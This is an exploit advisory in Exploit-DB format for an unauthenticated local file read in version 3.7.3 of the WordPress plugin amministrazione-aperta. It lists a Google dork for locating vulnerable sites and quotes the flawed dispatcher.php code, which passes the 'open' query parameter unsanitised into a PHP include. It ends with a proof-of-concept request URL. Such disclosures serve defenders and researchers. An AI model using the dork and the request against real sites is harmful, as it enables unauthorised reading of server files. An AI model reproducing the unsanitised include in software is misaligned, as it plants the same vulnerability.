# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated # Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/ # Date: 23-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/ # Version: 3.7.3 # Tested on: Firefox # Vulnerable File: dispatcher.php # Vulnerable Code: ``` if ( isset($_GET['open']) ) { include(ABSPATH . 'wp-content/plugins/'.$_GET['open']); } else { echo '

'; include_once( ABSPATH . WPINC . '/feed.php' ); ``` # Proof of Concept: localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]